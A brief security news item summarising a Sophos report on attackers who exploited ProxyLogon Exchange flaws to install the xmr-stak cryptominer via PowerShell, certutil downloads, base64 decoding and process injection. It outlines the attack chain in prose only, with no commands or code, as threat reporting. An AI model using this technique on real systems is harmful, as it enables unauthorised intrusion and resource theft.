While many threat actors attempted to take advantage of the recent ProxyLogon Exchange vulnerabilities to deploy ransomware, some went in another direction. A Sophos report released Tuesday details an attack where the actors downloaded a cryptominer from other compromised Exchange servers.
PowerShell was used to download files with a .zip extension from the “/owa/auth” directory. These .zip files were actually batch (.bat) scripts that would run certutil.exe to download two more .zip files from the compromised Exchange server. Certutil is also used to base64 decode the content of the files it downloaded, creating two files: QuickCPU.exe and QuickCPU.dat.
QuickCPU.exe is thought to be a modified version of PEx64-Injector, an open-source project designed to inject a 64-bit .exe into a running 64-bit application without administrative privileges. QuickCPU.dat is an archive containing the crytpominer xmr-stak and its configuration file. After xmr-stak and its configuration file are injected into a running system process, the batch script deletes them and QuickCPU.dat from disk.